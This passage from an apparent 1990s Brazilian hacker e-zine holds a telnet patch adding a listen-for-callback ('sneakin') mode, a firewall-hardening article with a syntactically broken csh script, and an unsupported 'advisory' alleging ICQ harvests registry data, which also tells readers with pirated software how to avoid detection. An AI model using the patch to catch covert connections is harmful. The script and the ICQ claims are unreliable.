_hostname[MAXHOSTNAMELEN]; @@ -1542,7 +1543,8 @@ */ static int dostatus(int notmuch) { if (connected) { - printf("Connected to %s.\n", hostname); + if (!callbackmode) printf("Connected to %s.\n", hostname); + else printf("Connected\n"); if (!notmuch) { int mode = getconnmode(); @@ -1628,7 +1630,7 @@ const char *cmd, *volatile user = 0; const char *portp = NULL; char *hostp = NULL; - + /* clear the socket address prior to use */ memset(&sn, 0, sizeof(sn)); @@ -1766,9 +1768,16 @@ } telnetport = 1; } - printf("Trying %s...\n", inet_ntoa(sn.sin_addr)); + if (!callbackmode) + printf("Trying %s...\n", inet_ntoa(sn.sin_addr)); + else printf("Waiting on port %d\n", atoi(portp)); + do { - int x = nlink.connect(debug, host, &sn, srp, srlen, tos); + int x; + + if (callbackmode) + x = nlink.accept(debug, sn.sin_port); + else x = nlink.connect(debug, host, &sn, srp, srlen, tos); if (!x) return 0; else if (x==1) continue; connected++; diff -urN telnet/main.cc telnet.sneakin/main.cc --- telnet/main.cc Thu Aug 15 06:18:27 1996 +++ telnet.sneakin/main.cc Fri Jun 6 22:25:13 1997 @@ -50,6 +50,8 @@ #include "defines.h" #include "proto.h" +char callbackmode=0; + /* * Initialize variables. */ @@ -78,7 +80,7 @@ void usage(void) { fprintf(stderr, "Usage: %s %s%s%s%s\n", prompt, - "[-8] [-E] [-L] [-a] [-d] [-e char] [-l user] [-n tracefile]", + "[-8] [-w] [-E] [-L] [-a] [-d] [-e char] [-l user] [-n tracefile]" "\n\t", #ifdef TN3270 "[-noasynch] [-noasynctty] [-noasyncnet] [-r] [-t transcom]\n\t", @@ -119,7 +121,7 @@ rlogin = (strncmp(prompt, "rlog", 4) == 0) ? '~' : _POSIX_VDISABLE; autologin = -1; - while ((ch = getopt(argc, argv, "8EKLS:X:ade:k:l:n:rt:x")) != EOF) { + while ((ch = getopt(argc, argv, "8EKLS:X:ade:k:l:n:rt:xw")) != EOF) { switch(ch) { case '8': eight = 3; /* binary output and input */ @@ -202,6 +204,9 @@ "%s: Warning: -t ignored, no TN3270 support.\n", prompt); #endif + break; + case 'w': + callbackmode = 1; break; case 'x': fprintf(stderr, diff -urN telnet/netlink.cc telnet.sneakin/netlink.cc --- telnet/netlink.cc Thu Aug 15 05:54:03 1996 +++ telnet.sneakin/netlink.cc Fri Jun 6 23:17:20 1997 @@ -111,6 +111,31 @@ } ::close(net); } +/* added for callback */ +int netlink::accept(int debug,unsigned short port) +{ + struct sockaddr_in our,remote; + int ls,val=1,size=sizeof(remote); + + ls = socket(AF_INET, SOCK_STREAM, 0); + our.sin_family = AF_INET; + our.sin_port = port; + our.sin_addr.s_addr = htonl(INADDR_ANY); + if (setsockopt(ls,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(long)) < 0) { + perror("telnet : setsockopt"); + return 0; + } + if ( bind(ls,(struct sockaddr*)&our,sizeof(our)) < 0) { + perror("telnet : bind()"); + return 0; + } + + listen(ls,1); + + net = ::accept(ls,(struct sockaddr*)&remote,&size); + + return 2; +} int netlink::connect(int debug, struct hostent *host, struct sockaddr_in *sn, diff -urN telnet/netlink.h telnet.sneakin/netlink.h --- telnet/netlink.h Fri Aug 2 11:33:48 1996 +++ telnet.sneakin/netlink.h Fri Jun 6 21:19:57 1997 @@ -6,6 +6,7 @@ netlink(); ~netlink(); + int accept(int debug,unsigned short port); int connect(int debug, struct hostent *host, struct sockaddr_in *sin, const char *srcroute, int srlen, -- Patch -- --- Medidas de seguranca para a sua rede --- Para aqueles que me chamaram de injusto so dando informacoes para o pessoal do blackpapers, ai vai uma pros whitepapers, tecnicas e politicas de protecao do seu firewall. - Firewall user Uma das primeiras atitudades a serem tomadas no seu sistema e' a de nao executar o seu firewall por meio de um usuario que seja root, admin, ou outro. Nobody? Razoes para nao usarem o nobody como usuario eu tenho aos montes, a) ele ja' esta muito sobrecarregado executando o seu apache, ftp server, news entre outros servicos... b) Ele pode ser facilmente persoadido por outros programas que tem rodam sobre a uid dele, uma vez conseguido ter acesso ao nobody, e' so um passo para desproteger a rede toda do firewall. c) eu nao gosto do nobody... mamae falou para nao falar com estranhos ;) Por isso eu recomendo que o firewall seja rodado por um usuario especial, por exemplo: fw, como e' no meu sistema. Tendo o firewall rodado por um unico usuario voce pode rodar o firewall por ele, se as devidas permissoes forem feitas no seu sistema. E ainda podem ser adotadas algumas medidas de seguranca quanto ao usuario. negacao de shell: Uma boa tecnica e' a de nao permitir a utilizacao de nenhuma shell por meio do usuario fw, isto e' algo estupido de se fazer: fw:x:uid:gid:firewall daeler:/luser/fw:/super/bin/.fw E o arquivo .fw seria algo assim: #!/bin/csh # #.Firewall daeler. senha= #Coloque uma senha so para uma segunda seguranca do firewall firewall= #coloque o caminho para o seu firewall com todos os flags que #deverao ser carregados para que ele rode do jeito que voce quer!! echo "Conectando o firewall!!!" pass: echo "Digite sua senha: " read pass if pass = $senha then echo "Bem vindo ao firewall daeler" echo "Executando o seu firewall.. Aguarde!!!" goto fwdlr else echo "Senha nao confere com a senha do firewall daeler" echo "Get off, sucker!!!" goto quit1 fi quit1: echo "Deseja sair?" echo "1: saiu!!!" echo "2: ficou!!!" echo ":> " read chc case $chc in 1) goto quit2 ;; 2) goto pass ;; esac quit2: echo "Tchau.. Firewall Daeler v1.0" echo "by bloodroot - blood@phone9.org" echo echo "Better lucky next time... 0kay?" exit 0 /bin/logout fwdlr: echo "Bem vindo ao Firewall Daeler v10" echo "by The bloodroot - blood@phone9.org" echo echo "-- executando seu firewall --" $firewall E' necessario, talvez criar um novo grupo somente para o firewall, fazendo com que voces possam ter os seus proprios grupos de arquivos, sem poderem interferir em outros grupos... Uma coisa e' basica, nao de mais atributos do que o necessario para o seu fw user... Pois este pode ser persoadido e tornar-se em uma fonte de bugs para o seu sistema. Outra coisa interessante, seria montar um /super/bin/ onde ficariam todos os arquivos binarios da galera da uid especial, ou que fazem algo de especial, assim sera mais facil controlar o acesso aos arquivos. Isto e' utilizado em varios servidores grandes como uol, openlink entre outros... e no meu linux, e' claro... hehehe!!! -- Cuidando de problemas do firewall -- Se houvesse um PROCON de reclamacoes sobre firewalls eu acredito que muitos iriam reclamar sobre a extensao de um firewall, devido a ma-cofngiruacao de muitos firewalls, e' possivel se deixar alguns servicos fora do controle, servicos rodando em portas muito altas para mais de 2000, que podem e sao um perigo para certas redes... Para resolver este problema, basta eliminar os servicos que voce nao usa, eu quero dizer todos... comente todos fora os que voce nao usa... e se algo acontecer de errado, tente resolve-lo sem retirar o comentario do servico. Lembrem-se, ninguem e' tao inocente quanto parece, o usuario que nao acessa na sua rede, pode ser o usuario que em um simples login detonou com o seu r00t... Entao de atencao para todos... ---[ Ultimas palavras... Bom, eu pretendo continuar escrevendo sobre segranca e falhas em firewalls, assim que alguns projetos meus e da galera forem liberados eu logo os irei implementar para sistemas de firewall com SOCK, TIS firewall Toolkit e IPFWADM, entao aguardem... Leitura opcional: - Read my ass... by the bloodroot, blood@phone9.org "I'll kick the root down, uppon my rootdown..." r00t d0wn k0mmunications , Inc. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³20 - Microsoftz advisory: ICQ, warez group??? ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Microsoftz Associates, Security Advisory. by Phineas Phreak. - microsoftz.cjb.net - microsoftz.cjb.net - microsoftz.cjb.net - ICQ procura por programas piratas! Recentemente isto tem chamado atenção dos usuários do ICQ de que a Mirabilis esta obtendo informacoes especificas do registro no sistema dos usuarios. O valor no registro: HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs\Auto Update foi colocado pelo cliente do ICQ desde a primeira versão. A intencao original deste valor nesta chave do registro era de permitir o ICQ atualizar automaticamente o cliente sem que o usuario precisa-se baixar a última versão. Mas, esta era a intencao original da Mirabilis, depois que foi comprada pela AOL este recurso esta sendo utilizado de ma fe. Ela permite que o servidor da mirabilis modifique o seu cliente do ICQ e en- vie comandos quando conectamos aos seus servidores. Esta instruindo maquinas para enviar varios componentes do registro do Windows para os servidores de ICQ periodicamente. Isto permite a Mirabilis ver que programas voce tem instalado no seu compu- tador, numeros de serie que você usou, seu nome, sua compania e outras coi- sas relativas ao seu endereço residencial! Esta informacao esta sendo obtida poderia ser vendida aos grandes vendedores de software como por exemplo a Microsoft que esta tentando combater softwa- res globalmente. Se eles nao tem intencao de vender esta informaaoo pegas do seu computador sem o seu conhecimento, o que eles vao fazer com isso? Se voce tiver programas piratas em seu computador, voce nao precisa ficar assustado. Se tem um programa pirata instalado no seu computador, verifique se esta registrado com um nome fantasma. Se nao for o caso, veja as instrucoes para desabilitar este recurso de atualizacao automatica instalado pela Mirabilis. As instrucoes a seguir sao fornecidas apenas para protege-lo, modificando o registro do Windows usando o Editor de Registro (regedit.exe) Passo 1: No editor de registro procure a chave: HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs\ Passo 2: Altere o valor do Auto Update para "No" Talvez a Mirabilis tenha decidido colocar este recurso para usar para atua- lizar seu cliente automaticamente e nao ser necessario fazer o download ma- nualmente. As versoes Java e Macintosh do cliente ICQ nao estao afetadas!!! Maiores informacoes a respeito desse problema pode ser encontrada na Wired! Phineas Phreak [ phineas@phone9.org | phineas@microsoftz.com ] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³20 - selbstmordert, o fim esta proximo ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Chegamos ao fim da nossa prodigia zine 31337, Phone9. Esperamos que vo- ces tenham aprendido algo de util para a insiguinificante vida de voces caso o contrario, telnet 127.0.0.1 19 =) Sites de download da Phone9: webcrunchers.com/phone9 deathknights.com/phone9 puruca.com.br/phone9 webelite.com.br/phone9 ereethackers.com/phone9 Solucoes para portas abertas indesejadas, Backdoor Protection System: phone9.org/labs/tools/bps.zip cya... The Phone9 communications Systems, Inc. contact: [blood@phone9.org]|[klepto@ereethackers.com] __ _____ _____ _ _ _____ /\ \ \___/ _ \ | _ | |_| | |/ \/ / __\__ / | __| _ | [ ] / /\ / __/ / / |__| |_| |_|_____\/ \/\____\/__/ The Phone9 Communications. thanx to: Puruca, Cacaio, Cezinha, [_Hi-Fi_], MaNdRaCk, Psychodeath, paranoia, Phineas Phreak, k0rn, k2, kkkk, Dr.Sm0g. klopek.